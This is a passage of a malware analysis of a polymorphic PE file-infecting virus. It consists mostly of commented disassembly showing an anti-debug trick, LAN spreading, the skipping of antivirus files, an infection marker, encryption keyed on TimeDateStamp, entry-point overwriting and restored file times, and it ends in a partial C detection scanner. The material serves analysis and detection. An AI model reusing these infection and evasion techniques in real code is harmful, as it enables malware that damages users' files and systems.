001364D0 68 04010000 PUSH 104
001364D5 8D87 54270000 LEA EAX,DWORD PTR DS:[EDI+2754]
001364DB 50 PUSH EAX
001364DC 6A 00 PUSH 0
001364DE FF97 912A0000 CALL DWORD PTR DS:[EDI+2A91] \\GetModuleFileName(NULL, EDI+2754, 104H), inferred from the arguments and from the buffer's reuse as the CreateProcess path at 0013655F
001364E4 8D87 D8290000 LEA EAX,DWORD PTR DS:[EDI+29D8]
001364EA 50 PUSH EAX
001364EB 6A 01 PUSH 1
001364ED 68 03001F00 PUSH 1F0003
001364F2 FF97 952A0000 CALL DWORD PTR DS:[EDI+2A95] \\OpenEvent(EVENT_ALL_ACCESS=1F0003H, TRUE, "DELPHI")
001364F8 8987 5C290000 MOV DWORD PTR DS:[EDI+295C],EAX
001364FE 83F8 00 CMP EAX,0
00136501 74 0C JE SHORT 0013650F \\jump if no "DELPHI" event exists yet
\\this jump is critical:
\\it decides whether execution takes the virus path or the original host program's path
00136503 50 PUSH EAX
00136504 FF97 792A0000 CALL DWORD PTR DS:[EDI+2A79] \\CloseHandle on the event handle (the same import is used on hFile at 00412F23)
0013650A E9 AF2B0000 JMP 001390BE
0013650F 8D87 D8290000 LEA EAX,DWORD PTR DS:[EDI+29D8]
00136515 50 PUSH EAX
00136516 6A 01 PUSH 1
00136518 6A 00 PUSH 0
0013651A 6A 00 PUSH 0
0013651C FF97 992A0000 CALL DWORD PTR DS:[EDI+2A99] \\CreateEvent(NULL, FALSE, TRUE, "DELPHI"): create the event named "DELPHI"
00136522 8987 5C290000 MOV DWORD PTR DS:[EDI+295C],EAX
00136528 57 PUSH EDI
00136529 8D87 70290000 LEA EAX,DWORD PTR DS:[EDI+2970]
0013652F 50 PUSH EAX
00136530 FF97 ED2A0000 CALL DWORD PTR DS:[EDI+2AED] \\one pointer argument, and the buffer is passed as lpStartupInfo below: GetStartupInfo (inferred)
00136536 5F POP EDI
00136537 8D87 60290000 LEA EAX,DWORD PTR DS:[EDI+2960]
0013653D 50 PUSH EAX
0013653E 8D87 70290000 LEA EAX,DWORD PTR DS:[EDI+2970]
00136544 50 PUSH EAX
00136545 6A 00 PUSH 0
00136547 6A 00 PUSH 0
00136549 6A 20 PUSH 20
0013654B 6A 00 PUSH 0
0013654D 6A 00 PUSH 0
0013654F 6A 00 PUSH 0
00136551 FF97 CD2A0000 CALL DWORD PTR DS:[EDI+2ACD] \\GetCommandLine (takes no arguments; the eight values pushed above stay on the stack as the remaining CreateProcess parameters)
00136557 50 PUSH EAX
00136558 8D87 54270000 LEA EAX,DWORD PTR DS:[EDI+2754]
0013655E 50 PUSH EAX
0013655F FF97 852A0000 CALL DWORD PTR DS:[EDI+2A85] \\CreateProcess: its own full path as lpApplicationName, the command line from GetCommandLine, creation flags 20H (NORMAL_PRIORITY_CLASS), &si, &pi
00136565 E8 00000000 CALL 0013656A
0013656A 58 POP EAX
0013656B 60 PUSHAD
0013656C 8D88 32000000 LEA ECX,DWORD PTR DS:[EAX+32] \\a disguised SEH installation: ECX = 0013656A+32H = 0013659C, the handler address
00136572 51 PUSH ECX
00136573 66:8CDA MOV DX,DS
00136576 0FA0 PUSH FS
00136578 1F POP DS
00136579 BB 00000000 MOV EBX,0
0013657E FF33 PUSH DWORD PTR DS:[EBX]
00136580 8BEC MOV EBP,ESP
00136582 892B MOV DWORD PTR DS:[EBX],EBP
00136584 66:8EDA MOV DS,DX
00136587 57 PUSH EDI
00136588 FF97 E52A0000 CALL DWORD PTR DS:[EDI+2AE5]
0013658E 5F POP EDI
0013658F 57 PUSH EDI
00136590 6A 01 PUSH 1
00136592 50 PUSH EAX
00136593 FF97 E92A0000 CALL DWORD PTR DS:[EDI+2AE9] \\an exception is raised here
00136599 5F POP EDI
0013659A EB 0F JMP SHORT 001365AB
0013659C 33DB XOR EBX,EBX \\exception handler (0013656A+32H); set a breakpoint here with F2, then F9 and Shift+F9 to pass the exception through
0013659E 66:8CDA MOV DX,DS
001365A1 0FA0 PUSH FS
001365A3 1F POP DS
001365A4 8B03 MOV EAX,DWORD PTR DS:[EBX]
001365A6 66:8EDA MOV DS,DX
001365A9 8B20 MOV ESP,DWORD PTR DS:[EAX]
001365AB 33DB XOR EBX,EBX
001365AD 66:8CDA MOV DX,DS
8. Enumerate the shared resources on the LAN and infect them.
9. Search the fixed disks C: through Z:,
a. files whose names contain one of the strings RUNDLL32\RUNONCE\RAV\LSASS\SERVICES\WINLOGON\SPOOLSV
MSTASK\RPCSS\AVCONSOL are not infected.
b. files smaller than 8K are not infected.
c. files in the system directory are not infected.
10. When an EXE file is found, first check whether it is a valid PE file, then check whether it has already been infected
(by testing whether the two bytes at TimeDateStamp+1 in the PE header equal C354H); if they do,
continue with the next file, otherwise go to 11.
11. The infection process in detail is as follows (the listing was dumped after the last decryption pass, so the addresses differ from those in OllyDbg,
but the instructions and their function are the same).
Note: the key used to encrypt the virus code and the original host code is derived from the host's TimeDateStamp.
00412A60 66:837E 5C 02 CMP WORD PTR DS:[ESI+5C],2 \\Subsystem == 2 (IMAGE_SUBSYSTEM_WINDOWS_GUI); otherwise the file is skipped
00412A65 0F85 7F040000 JNZ CLSPACK.00412EEA
00412A6B 8B46 08 MOV EAX,DWORD PTR DS:[ESI+8] \\TimeDateStamp
00412A6E 83F8 00 CMP EAX,0
00412A71 75 21 JNZ SHORT CLSPACK.00412A94 \\if TimeDateStamp is nonzero use it as the key, otherwise use E4C3542D as the key
00412A73 B8 2D54C3E4 MOV EAX,E4C3542D \\the key: E4C3542D
00412A78 C787 7F100000 CA>MOV DWORD PTR DS:[EDI+107F],2ACA
00412A82 C787 85100000 7C>MOV DWORD PTR DS:[EDI+1085],67C
00412A8C 8946 08 MOV DWORD PTR DS:[ESI+8],EAX
00412A8F E9 C3000000 JMP CLSPACK.00412B57
00412A94 8987 AA300000 MOV DWORD PTR DS:[EDI+30AA],EAX \\the following block is the key part
00412A9A 50 PUSH EAX
00412A9B 53 PUSH EBX
00412A9C 35 DF6A45D3 XOR EAX,D3456ADF \\D3456ADF
00412AA1 8987 4A100000 MOV DWORD PTR DS:[EDI+104A],EAX
00412AA7 BB FFFAFFFF MOV EBX,-501
00412AAC 2BD8 SUB EBX,EAX
00412AAE 899F 50100000 MOV DWORD PTR DS:[EDI+1050],EBX
00412AB4 5B POP EBX
00412AB5 58 POP EAX
00412AB6 53 PUSH EBX
00412AB7 51 PUSH ECX
00412AB8 E8 FB060000 CALL CLSPACK.004131B8 \\EAX = (TimeDateStamp*7FFFFFFFH+1) % -5,
with TimeDateStamp passed in EAX
00412ABD 8BD8 MOV EBX,EAX
00412ABF C1EB 08 SHR EBX,8
00412AC2 50 PUSH EAX
00412AC3 53 PUSH EBX
00412AC4 51 PUSH ECX
00412AC5 52 PUSH EDX
00412AC6 8BC3 MOV EAX,EBX
00412AC8 8BCB MOV ECX,EBX
00412ACA 25 FF000000 AND EAX,0FF
00412ACF 50 PUSH EAX \\this block appears to be the random-number selection stage of the polymorphic engine
00412AD0 C1E8 04 SHR EAX,4
00412AD3 24 07 AND AL,7
00412AD5 3C 05 CMP AL,5
00412AD7 76 02 JBE SHORT CLSPACK.00412ADB
00412AD9 2C 02 SUB AL,2
00412ADB 8AD8 MOV BL,AL
00412ADD 58 POP EAX
00412ADE 24 07 AND AL,7
00412AE0 3C 05 CMP AL,5
00412AE2 76 02 JBE SHORT CLSPACK.00412AE6
00412AE4 2C 04 SUB AL,4
00412AE6 38D8 CMP AL,BL
00412AE8 75 34 JNZ SHORT CLSPACK.00412B1E
00412AEA 8BD9 MOV EBX,ECX
00412AEC C1EB 08 SHR EBX,8
00412AEF 8BC3 MOV EAX,EBX
00412AF1 25 FF000000 AND EAX,0FF
00412AF6 50 PUSH EAX
00412AF7 C1E8 04 SHR EAX,4
00412AFA 24 07 AND AL,7
00412AFC 3C 05 CMP AL,5
00412AFE 76 02 JBE SHORT CLSPACK.00412B02
00412B00 2C 02 SUB AL,2
00412B02 8AD8 MOV BL,AL
00412B04 58 POP EAX
00412B05 24 07 AND AL,7
00412B07 3C 05 CMP AL,5
00412B09 76 02 JBE SHORT CLSPACK.00412B0D
00412B0B 2C 04 SUB AL,4
00412B0D 38D8 CMP AL,BL
00412B0F 75 0D JNZ SHORT CLSPACK.00412B1E
00412B11 3C 05 CMP AL,5
00412B13 74 04 JE SHORT CLSPACK.00412B19
00412B15 FEC3 INC BL
00412B17 EB 05 JMP SHORT CLSPACK.00412B1E
00412B19 80E2 03 AND DL,3
00412B1C 8ADA MOV BL,DL
00412B1E 83E0 07 AND EAX,7
00412B21 83E3 07 AND EBX,7
00412B24 83E1 07 AND ECX,7
00412B27 E8 6C050000 CALL CLSPACK.00413098 \\this CALL generates random code from the random numbers produced above (it contains a lookup table)
00412B2C 5A POP EDX
00412B2D 59 POP ECX
00412B2E 5B POP EBX
00412B2F 58 POP EAX
00412B30 81E3 FF0F0000 AND EBX,0FFF
00412B36 899F 7F100000 MOV DWORD PTR DS:[EDI+107F],EBX
00412B3C B9 46310000 MOV ECX,3146
00412B41 2BCB SUB ECX,EBX
00412B43 898F 85100000 MOV DWORD PTR DS:[EDI+1085],ECX
00412B49 59 POP ECX
00412B4A 5B POP EBX
00412B4B 8987 8F100000 MOV DWORD PTR DS:[EDI+108F],EAX
00412B51 66:C746 09 54C3 MOV WORD PTR DS:[ESI+9],0C354 \\write the infection marker; this is TimeDateStamp+1 in the PE file header
00412B57 8B46 28 MOV EAX,DWORD PTR DS:[ESI+28] \\原AddressOfEntryPoint
00412B5A 8987 5F060000 MOV DWORD PTR DS:[EDI+65F],EAX \\the original entry address is visible at offset +65F of the decrypted virus body
00412B60 8B46 38 MOV EAX,DWORD PTR DS:[ESI+38] \\SectionAlignment
00412B63 8987 942E0000 MOV DWORD PTR DS:[EDI+2E94],EAX
00412B69 8B46 34 MOV EAX,DWORD PTR DS:[ESI+34] \\ImageBase
00412B6C 8987 B2300000 MOV DWORD PTR DS:[EDI+30B2],EAX
00412B72 8D5E 18 LEA EBX,DWORD PTR DS:[ESI+18] \\Magic
00412B75 33D2 XOR EDX,EDX
00412B77 66:8B56 14 MOV DX,WORD PTR DS:[ESI+14] \\SizeOfOptionalHeader
00412B7B 03DA ADD EBX,EDX \\EBX -> first section header
00412B7D 33C9 XOR ECX,ECX
00412B7F 66:8B4E 06 MOV CX,WORD PTR DS:[ESI+6] \\NumberOfSections
00412B83 8B46 28 MOV EAX,DWORD PTR DS:[ESI+28] \\AddressofEntryPoint
00412B86 8B53 0C MOV EDX,DWORD PTR DS:[EBX+C] \\VirtualAddress
00412B89 3BC2 CMP EAX,EDX
00412B8B 72 07 JB SHORT CLSPACK.00412B94 \\if AddressOfEntryPoint < VirtualAddress, move on to the next section
00412B8D 0353 08 ADD EDX,DWORD PTR DS:[EBX+8] \\VirtualSize
00412B90 3BC2 CMP EAX,EDX
00412B92 76 18 JBE SHORT CLSPACK.00412BAC \\jump if the entry point lies inside the current section
00412B94 83C3 28 ADD EBX,28
00412B97 ^E2 EA LOOPD SHORT CLSPACK.00412B83
00412B99 80BF A02E0000 01 CMP BYTE PTR DS:[EDI+2EA0],1
00412BA0 74 05 JE SHORT CLSPACK.00412BA7
00412BA2 E9 43030000 JMP CLSPACK.00412EEA
00412BA7 E9 F5190000 JMP CLSPACK.004145A1
00412BAC 50 PUSH EAX
00412BAD 52 PUSH EDX
00412BAE 05 00020000 ADD EAX,200
00412BB3 8B53 0C MOV EDX,DWORD PTR DS:[EBX+C] \\VirtualAddress
00412BB6 0353 10 ADD EDX,DWORD PTR DS:[EBX+10] \\SizeOfRawData
00412BB9 3BC2 CMP EAX,EDX
00412BBB 5A POP EDX
00412BBC 58 POP EAX
00412BBD 77 24 JA SHORT CLSPACK.00412BE3
00412BBF 50 PUSH EAX
00412BC0 0346 34 ADD EAX,DWORD PTR DS:[ESI+34] \\ImageBase
00412BC3 8987 18060000 MOV DWORD PTR DS:[EDI+618],EAX \\ImageBase+AddressOfEntryPoint
00412BC9 8B43 24 MOV EAX,DWORD PTR DS:[EBX+24] \\Characteristics
00412BCC 0D 00000020 OR EAX,20000000 \\IMAGE_SCN_MEM_EXECUTE
00412BD1 8943 24 MOV DWORD PTR DS:[EBX+24],EAX \\write back
00412BD4 58 POP EAX \\AddressOfEntryPoint
00412BD5 2B43 0C SUB EAX,DWORD PTR DS:[EBX+C] \\EAX-VirtualAddress
00412BD8 0343 14 ADD EAX,DWORD PTR DS:[EBX+14] \\PointerToRawData
00412BDB 8987 A22E0000 MOV DWORD PTR DS:[EDI+2EA2],EAX \\EAX->FileOffset
00412BE1 EB 2F JMP SHORT CLSPACK.00412C12
00412BE3 50 PUSH EAX
00412BE4 52 PUSH EDX
00412BE5 8B53 0C MOV EDX,DWORD PTR DS:[EBX+C]
00412BE8 8956 28 MOV DWORD PTR DS:[ESI+28],EDX
00412BEB 0356 34 ADD EDX,DWORD PTR DS:[ESI+34]
00412BEE 8997 18060000 MOV DWORD PTR DS:[EDI+618],EDX
00412BF4 8B43 24 MOV EAX,DWORD PTR DS:[EBX+24]
00412BF7 0D 00000020 OR EAX,20000000
00412BFC 8943 24 MOV DWORD PTR DS:[EBX+24],EAX
00412BFF 5A POP EDX
00412C00 58 POP EAX
00412C01 8B43 14 MOV EAX,DWORD PTR DS:[EBX+14]
00412C04 8987 A22E0000 MOV DWORD PTR DS:[EDI+2EA2],EAX
00412C0A 8987 8C2E0000 MOV DWORD PTR DS:[EDI+2E8C],EAX
00412C10 EB 79 JMP SHORT CLSPACK.00412C8B
00412C12 8D5E 18 LEA EBX,DWORD PTR DS:[ESI+18] \\ESI -> "PE"
00412C15 33D2 XOR EDX,EDX
00412C17 66:8B56 14 MOV DX,WORD PTR DS:[ESI+14]
00412C1B 03DA ADD EBX,EDX \\EBX -> first section header (.text)
00412C1D 33C9 XOR ECX,ECX
00412C1F 66:8B4E 06 MOV CX,WORD PTR DS:[ESI+6] \\NumberOfSections
00412C23 8B43 10 MOV EAX,DWORD PTR DS:[EBX+10] \\SizeOfRawData
00412C26 2B43 08 SUB EAX,DWORD PTR DS:[EBX+8] \\VirtualSize
00412C29 3B87 AE300000 CMP EAX,DWORD PTR DS:[EDI+30AE] \\CMP EAX,200
00412C2F 7D 37 JGE SHORT CLSPACK.00412C68
00412C31 8B46 28 MOV EAX,DWORD PTR DS:[ESI+28]
00412C34 8B53 0C MOV EDX,DWORD PTR DS:[EBX+C]
00412C37 3BC2 CMP EAX,EDX
00412C39 72 07 JB SHORT CLSPACK.00412C42
00412C3B 0353 08 ADD EDX,DWORD PTR DS:[EBX+8]
00412C3E 3BC2 CMP EAX,EDX
00412C40 76 18 JBE SHORT CLSPACK.00412C5A
00412C42 83C3 28 ADD EBX,28
00412C45 ^E2 DC LOOPD SHORT CLSPACK.00412C23
00412C47 80BF A02E0000 01 CMP BYTE PTR DS:[EDI+2EA0],1
00412C4E 74 05 JE SHORT CLSPACK.00412C55
00412C50 E9 95020000 JMP CLSPACK.00412EEA
00412C55 E9 47190000 JMP CLSPACK.004145A1
00412C5A 2B43 0C SUB EAX,DWORD PTR DS:[EBX+C]
00412C5D 0343 14 ADD EAX,DWORD PTR DS:[EBX+14]
00412C60 8987 8C2E0000 MOV DWORD PTR DS:[EDI+2E8C],EAX \\EPO file offset
00412C66 EB 23 JMP SHORT CLSPACK.00412C8B
00412C68 8B43 14 MOV EAX,DWORD PTR DS:[EBX+14]
00412C6B 0343 08 ADD EAX,DWORD PTR DS:[EBX+8]
00412C6E 8987 8C2E0000 MOV DWORD PTR DS:[EDI+2E8C],EAX
00412C74 8B43 0C MOV EAX,DWORD PTR DS:[EBX+C]
00412C77 0343 08 ADD EAX,DWORD PTR DS:[EBX+8]
00412C7A 8946 28 MOV DWORD PTR DS:[ESI+28],EAX
00412C7D 50 PUSH EAX
00412C7E 8B43 08 MOV EAX,DWORD PTR DS:[EBX+8]
00412C81 0387 AE300000 ADD EAX,DWORD PTR DS:[EDI+30AE]
00412C87 8943 08 MOV DWORD PTR DS:[EBX+8],EAX
00412C8A 58 POP EAX
00412C8B 83C3 28 ADD EBX,28
00412C8E ^E2 FB LOOPD SHORT CLSPACK.00412C8B \\walk to the last section header
00412C90 83EB 28 SUB EBX,28
00412C93 C743 24 400000C0 MOV DWORD PTR DS:[EBX+24],C0000040 \\change the section characteristics: MEM_WRITE|MEM_READ|CNT_INITIALIZED_DATA (no MEM_EXECUTE)
00412C9A 8B43 10 MOV EAX,DWORD PTR DS:[EBX+10] \\SizeOfRawData
00412C9D 50 PUSH EAX
00412C9E 0343 0C ADD EAX,DWORD PTR DS:[EBX+C] \\VirtualAddress
00412CA1 0346 34 ADD EAX,DWORD PTR DS:[ESI+34] \\ImageBase
00412CA4 51 PUSH ECX
00412CA5 8A4E 08 MOV CL,BYTE PTR DS:[ESI+8] \\TimeDateStamp
00412CA8 80E1 1F AND CL,1F
00412CAB 888F 8B100000 MOV BYTE PTR DS:[EDI+108B],CL
00412CB1 D3C8 ROR EAX,CL
00412CB3 59 POP ECX
00412CB4 8987 7A100000 MOV DWORD PTR DS:[EDI+107A],EAX \\020CA000H
00412CBA B9 00320000 MOV ECX,3200
00412CBF 014B 10 ADD DWORD PTR DS:[EBX+10],ECX \\add 3200H to the last section's SizeOfRawData
00412CC2 014E 20 ADD DWORD PTR DS:[ESI+20],ECX \\SizeOfInitializedData += 3200H
00412CC5 8B43 10 MOV EAX,DWORD PTR DS:[EBX+10]
00412CC8 3B43 08 CMP EAX,DWORD PTR DS:[EBX+8]
00412CCB 76 03 JBE SHORT CLSPACK.00412CD0
00412CCD 8943 08 MOV DWORD PTR DS:[EBX+8],EAX
00412CD0 05 FF0F0000 ADD EAX,0FFF \\round up to 1000H (hard-coded, not the SectionAlignment saved at 00412B63)
00412CD5 25 00F0FFFF AND EAX,FFFFF000
00412CDA 0343 0C ADD EAX,DWORD PTR DS:[EBX+C]
00412CDD 8946 50 MOV DWORD PTR DS:[ESI+50],EAX \\SizeOfImage
00412CE0 52 PUSH EDX
00412CE1 8B53 08 MOV EDX,DWORD PTR DS:[EBX+8]
00412CE4 0353 0C ADD EDX,DWORD PTR DS:[EBX+C]
00412CE7 3BC2 CMP EAX,EDX
00412CE9 73 03 JNB SHORT CLSPACK.00412CEE
00412CEB 8956 50 MOV DWORD PTR DS:[ESI+50],EDX
00412CEE 5A POP EDX
00412CEF 5A POP EDX \\original SizeOfRawData of the last section (pushed at 00412C9D)
00412CF0 0353 14 ADD EDX,DWORD PTR DS:[EBX+14] \\EDX = end of the last section's raw data in the file
00412CF3 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88] \\hFile
00412CF9 80BF A02E0000 01 CMP BYTE PTR DS:[EDI+2EA0],1
00412D00 75 05 JNZ SHORT CLSPACK.00412D07
00412D02 E9 75170000 JMP CLSPACK.0041447C
00412D07 51 PUSH ECX
00412D08 52 PUSH EDX
00412D09 6A 00 PUSH 0
00412D0B 53 PUSH EBX
00412D0C FF97 B12A0000 CALL DWORD PTR DS:[EDI+2AB1] \\GetFileSize
00412D12 5A POP EDX
00412D13 59 POP ECX
00412D14 83F8 00 CMP EAX,0
00412D17 0F84 CD010000 JE CLSPACK.00412EEA
00412D1D 8BDA MOV EBX,EDX
00412D1F 81C3 00020000 ADD EBX,200
00412D25 3BC3 CMP EAX,EBX
00412D27 0F87 BD010000 JA CLSPACK.00412EEA \\skip the file if it is more than 200H bytes longer than the end of the last section (appended data/overlay)
00412D2D 60 PUSHAD
00412D2E 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412D34 6A 00 PUSH 0
00412D36 6A 00 PUSH 0
00412D38 8B97 A22E0000 MOV EDX,DWORD PTR DS:[EDI+2EA2]
00412D3E 52 PUSH EDX
00412D3F 53 PUSH EBX
00412D40 FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89] \\SetFilePointer
00412D46 83F8 00 CMP EAX,0
00412D49 61 POPAD
00412D4A 0F84 9A010000 JE CLSPACK.00412EEA
00412D50 60 PUSHAD
00412D51 6A 00 PUSH 0
00412D53 8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]
00412D59 50 PUSH EAX
00412D5A B8 04020000 MOV EAX,204
00412D5F 50 PUSH EAX
00412D60 8D87 A62E0000 LEA EAX,DWORD PTR DS:[EDI+2EA6]
00412D66 50 PUSH EAX
00412D67 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412D6D 53 PUSH EBX
00412D6E FF97 9D2A0000 CALL DWORD PTR DS:[EDI+2A9D] \\ReadFile: 204H bytes at the entry-point file offset into EDI+2EA6 (the host code to be saved)
00412D74 83F8 00 CMP EAX,0
00412D77 61 POPAD
00412D78 0F84 6C010000 JE CLSPACK.00412EEA
00412D7E 83BF A6300000 00 CMP DWORD PTR DS:[EDI+30A6],0
00412D85 75 0A JNZ SHORT CLSPACK.00412D91
00412D87 C787 A6300000 6A>MOV DWORD PTR DS:[EDI+30A6],23EDA56A
00412D91 60 PUSHAD
00412D92 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412D98 6A 00 PUSH 0
00412D9A 6A 00 PUSH 0
00412D9C 8B97 A22E0000 MOV EDX,DWORD PTR DS:[EDI+2EA2]
00412DA2 52 PUSH EDX
00412DA3 53 PUSH EBX
00412DA4 FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89] \\SetFilePointer
00412DAA 83F8 00 CMP EAX,0
00412DAD 61 POPAD
00412DAE 0F84 36010000 JE CLSPACK.00412EEA
00412DB4 60 PUSHAD
00412DB5 6A 00 PUSH 0
00412DB7 8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]
00412DBD 50 PUSH EAX
00412DBE B8 00020000 MOV EAX,200
00412DC3 50 PUSH EAX
00412DC4 8D87 4E3F0000 LEA EAX,DWORD PTR DS:[EDI+3F4E]
00412DCA 50 PUSH EAX
00412DCB 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412DD1 53 PUSH EBX
00412DD2 FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D] \\WriteFile: 200H bytes from EDI+3F4E over the entry point
00412DD8 83F8 00 CMP EAX,0
00412DDB 61 POPAD
00412DDC 0F84 08010000 JE CLSPACK.00412EEA
00412DE2 E8 F5030000 CALL CLSPACK.004131DC \\Xor [ESI],EAX len=1FCH
00412DE7 E8 21050000 CALL CLSPACK.0041330D \\ROR EAX,10H len=BF5H
00412DEC E8 3B050000 CALL CLSPACK.0041332C \\this is where the five layers of encryption are applied
00412DF1 E8 F9040000 CALL CLSPACK.004132EF
00412DF6 E8 C3040000 CALL CLSPACK.004132BE \\in the reverse order of the five decryption passes seen earlier
00412DFB 60 PUSHAD
00412DFC E8 92030000 CALL CLSPACK.00413193
00412E01 61 POPAD
00412E02 60 PUSHAD
00412E03 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412E09 6A 00 PUSH 0
00412E0B 6A 00 PUSH 0
00412E0D 52 PUSH EDX
00412E0E 53 PUSH EBX
00412E0F FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89]
00412E15 83F8 00 CMP EAX,0
00412E18 61 POPAD
00412E19 0F84 CB000000 JE CLSPACK.00412EEA
00412E1F 60 PUSHAD
00412E20 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412E26 6A 00 PUSH 0
00412E28 8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]
00412E2E 50 PUSH EAX
00412E2F 51 PUSH ECX
00412E30 8D87 4E3F0000 LEA EAX,DWORD PTR DS:[EDI+3F4E]
00412E36 50 PUSH EAX
00412E37 53 PUSH EBX
00412E38 FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D]
00412E3E 83F8 00 CMP EAX,0
00412E41 61 POPAD
00412E42 0F84 A2000000 JE CLSPACK.00412EEA
00412E48 60 PUSHAD
00412E49 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412E4F 6A 00 PUSH 0
00412E51 6A 00 PUSH 0
00412E53 FFB7 902E0000 PUSH DWORD PTR DS:[EDI+2E90]
00412E59 53 PUSH EBX
00412E5A FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89]
00412E60 83F8 00 CMP EAX,0
00412E63 61 POPAD
00412E64 0F84 80000000 JE CLSPACK.00412EEA
00412E6A 60 PUSHAD
00412E6B 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412E71 6A 00 PUSH 0
00412E73 8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]
00412E79 50 PUSH EAX
00412E7A 68 00040000 PUSH 400
00412E7F 8D87 4A310000 LEA EAX,DWORD PTR DS:[EDI+314A]
00412E85 50 PUSH EAX
00412E86 53 PUSH EBX
00412E87 FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D]
00412E8D 83F8 00 CMP EAX,0
00412E90 61 POPAD
00412E91 74 57 JE SHORT CLSPACK.00412EEA
00412E93 60 PUSHAD
00412E94 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412E9A 6A 00 PUSH 0
00412E9C 6A 00 PUSH 0
00412E9E FFB7 8C2E0000 PUSH DWORD PTR DS:[EDI+2E8C]
00412EA4 53 PUSH EBX
00412EA5 FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89]
00412EAB 83F8 00 CMP EAX,0
00412EAE 61 POPAD
00412EAF 74 39 JE SHORT CLSPACK.00412EEA
00412EB1 E8 0A050000 CALL CLSPACK.004133C0
00412EB6 E8 D20C0000 CALL CLSPACK.00413B8D
00412EBB E8 35030000 CALL CLSPACK.004131F5
00412EC0 60 PUSHAD
00412EC1 8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412EC7 6A 00 PUSH 0
00412EC9 8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]
00412ECF 50 PUSH EAX
00412ED0 FFB7 AE300000 PUSH DWORD PTR DS:[EDI+30AE]
00412ED6 8D87 4A310000 LEA EAX,DWORD PTR DS:[EDI+314A]
00412EDC 50 PUSH EAX
00412EDD 53 PUSH EBX
00412EDE FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D]
00412EE4 83F8 00 CMP EAX,0
00412EE7 61 POPAD
00412EE8 74 00 JE SHORT CLSPACK.00412EEA
00412EEA 8B87 B8290000 MOV EAX,DWORD PTR DS:[EDI+29B8]
00412EF0 83E8 2C SUB EAX,2C
00412EF3 83C0 14 ADD EAX,14
00412EF6 50 PUSH EAX
00412EF7 8B87 B8290000 MOV EAX,DWORD PTR DS:[EDI+29B8]
00412EFD 83E8 2C SUB EAX,2C
00412F00 83C0 0C ADD EAX,0C
00412F03 50 PUSH EAX
00412F04 8B87 B8290000 MOV EAX,DWORD PTR DS:[EDI+29B8]
00412F0A 83E8 2C SUB EAX,2C
00412F0D 83C0 04 ADD EAX,4
00412F10 50 PUSH EAX
00412F11 FFB7 882E0000 PUSH DWORD PTR DS:[EDI+2E88]
00412F17 FF97 B52A0000 CALL DWORD PTR DS:[EDI+2AB5] \\SetFileTime(hFile, &creation, &lastaccess, &lastwrite): restore the original file times to avoid detection
00412F1D FFB7 882E0000 PUSH DWORD PTR DS:[EDI+2E88]
00412F23 FF97 792A0000 CALL DWORD PTR DS:[EDI+2A79] \\CloseHandle(hFile); the same import closes the event handle at 00136504
00412F29 81BF 412B0000 88>CMP DWORD PTR DS:[EDI+2B41],88888888
00412F33 74 17 JE SHORT CLSPACK.00412F4C
00412F35 81BF 4D2B0000 CC>CMP DWORD PTR DS:[EDI+2B4D],CCCCCCCC
00412F3F 74 0B JE SHORT CLSPACK.00412F4C
00412F41 68 00100000 PUSH 1000
00412F46 FF97 A92A0000 CALL DWORD PTR DS:[EDI+2AA9] \\Sleep
00412F4C FFB7 842E0000 PUSH DWORD PTR DS:[EDI+2E84]
00412F52 FFB7 B4290000 PUSH DWORD PTR DS:[EDI+29B4]
00412F58 FF97 A12A0000 CALL DWORD PTR DS:[EDI+2AA1] \\SetFileAttributes: restore the original file attributes
00412F5E 5E POP ESI
00412F5F C3 RETN
12. Then decrypt the original host program's code (200H bytes in total, the length of the WriteFile at 00412DD2),
restore the original AddressOfEntryPoint and run the original program.
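As an added example (not code from this article or from the virus), the following C scanner applies the checks of steps 10 and 11 to a PE image held in memory: it validates the MZ and PE signatures, tests the WORD at TimeDateStamp+1 against C354H, reports which key the virus would pick for a clean host (TimeDateStamp, or E4C3542D when it is zero), and walks the section table with the same inclusive bounds test the virus uses at 00412B89..00412B92 to find the section holding AddressOfEntryPoint and the matching file offset. It also flags a last section whose Characteristics equal C0000040, the value written at 00412C93. The two-section PE32 header it scans is constructed in build_sample with made-up values and no real code, so the block runs offline; the function and field names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constants taken from the listing above. */
#define INFECT_MARKER  0xC354u       /* WORD written at TimeDateStamp+1 (00412B51) */
#define DEFAULT_KEY    0xE4C3542Du   /* key used when TimeDateStamp == 0 (00412A73) */
#define LAST_SEC_CHARS 0xC0000040u   /* WRITE|READ|CNT_INITIALIZED_DATA (00412C93) */

typedef struct {
    int      valid_pe;         /* "MZ" and "PE\0\0" present, headers inside the buffer */
    int      infected;         /* WORD at TimeDateStamp+1 == C354H */
    uint32_t time_date_stamp;
    uint32_t key;              /* key the virus would select for a clean host */
    uint32_t entry_rva;        /* AddressOfEntryPoint */
    int      ep_section;       /* index of the section containing the entry point, -1 if none */
    uint32_t ep_file_offset;   /* EP - VirtualAddress + PointerToRawData, as at 00412BD5 */
    int      last_sec_rw_data; /* last section Characteristics == C0000040 */
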